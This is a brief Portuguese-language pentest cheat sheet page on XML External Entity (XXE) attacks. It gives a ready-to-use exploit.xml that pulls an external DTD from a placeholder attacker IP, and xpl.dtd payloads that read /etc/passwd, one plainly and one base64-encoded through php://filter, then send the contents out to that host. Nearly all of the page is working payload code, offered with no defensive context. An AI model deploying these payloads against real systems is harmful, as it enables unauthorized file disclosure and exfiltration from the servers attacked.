XXE

XXE Comum

Arquivo exploit.xml

<?xml version="1.0"?>
<!DOCTYPE nosf[
    <!ELEMENT nosf ANY>
    <!ENTITY % dtd SYSTEM "http://IP/xpl.dtd">
%dtd;]>
<nosf></nosf>

Arquivo xpl.dtd

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://IP/content=%file'>">
%all

As vezes é bom tentar encodar em base64 também os arquivos. 😉

<!ENTITY % file SYSTEM ""php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://IP/content=%file'>">
%all

PreviousPython NextRecon

Last updated 3 years ago

hashtagXXE Comum

XXE Comum